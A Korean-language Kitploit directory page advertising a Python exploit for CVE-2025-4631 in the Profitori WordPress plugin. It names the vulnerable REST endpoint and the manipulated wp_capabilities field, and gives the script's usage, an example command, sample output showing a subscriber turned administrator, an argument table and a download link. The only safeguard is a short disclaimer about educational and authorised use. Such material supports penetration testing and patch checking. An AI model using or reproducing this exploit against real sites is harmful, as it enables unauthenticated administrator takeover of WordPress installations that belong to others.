Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - 인증 누락에서 비인증 권한 상승까지 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-4631
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - 인증 누락에서 비인증 권한 상승까지

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2025-4631 - Profitori WordPress 플러그인 권한 상승 익스플로잇

📌 취약점 요약

**Profitori 플러그인 (버전 2.0.6.0 ~ 2.1.1.3)**은 /wp-json/stocktend/v1/stocktend_object 엔드포인트에서 누락된 권한 확인으로 인해 인증되지 않은 권한 상승에 취약합니다. 이를 통해 원격 공격자는 wp_capabilities 메타 필드를 직접 조작하여 기존 사용자의 권한을 상승시키거나 (또는 새 사용자를 생성할 수 있습니다).

  • CVE: CVE-2025-4631
  • CVSS 점수: 9.8 (심각)
  • 게시일: 2025-05-30
  • 마지막 업데이트: 2025-05-31

🛠️ 이 스크립트의 기능

이 Python 익스플로잇은 다음을 통해 권한 상승 과정을 자동화합니다:

  1. ✅ readme.txt 파일을 통해 플러그인 버전 확인.
  2. 🚀 취약한 버전이 감지되면 취약한 REST API 엔드포인트를 익스플로잇.
  3. 📡 페이로드를 전송하여 사용자의 권한을 관리자로 상승.
  4. 🧾 수정된 사용자의 자격 증명을 포함한 형식화된 상세 결과 출력.

버전 확인이 실패하면 경고와 함께 조심스럽게 익스플로잇을 진행합니다.


📸 익스플로잇 증명

개념 증명


💻 사용법

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

예시:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

샘플 출력:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ 스크립트 인수


📂 요구 사항

  • Python 3.x
  • requests 라이브러리

설치 방법:

root@kitploit:~
pip install requests

⚠️ 면책 조항

이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가가 없는 시스템에 대해 이 익스플로잇을 오용하는 것은 엄격히 금지됩니다. 제작자는 부적절한 사용으로 인한 손해나 법적 책임을 지지 않습니다.


BY: Nxploited ( Khaled_Alenazi )

도구 다운로드
플래그설명필수 여부
-u, --url🌐 WordPress 사이트의 기본 URL✅ 예
-id🆔 권한을 상승시킬 사용자의 ID✅ 예
--email📧 표시할 가짜 이메일❌ 아니오
--name👤 표시 이름❌ 아니오
--url_field🔗 사용자 URL 필드❌ 아니오
--verbose🔍 전체 JSON 응답 출력❌ 아니오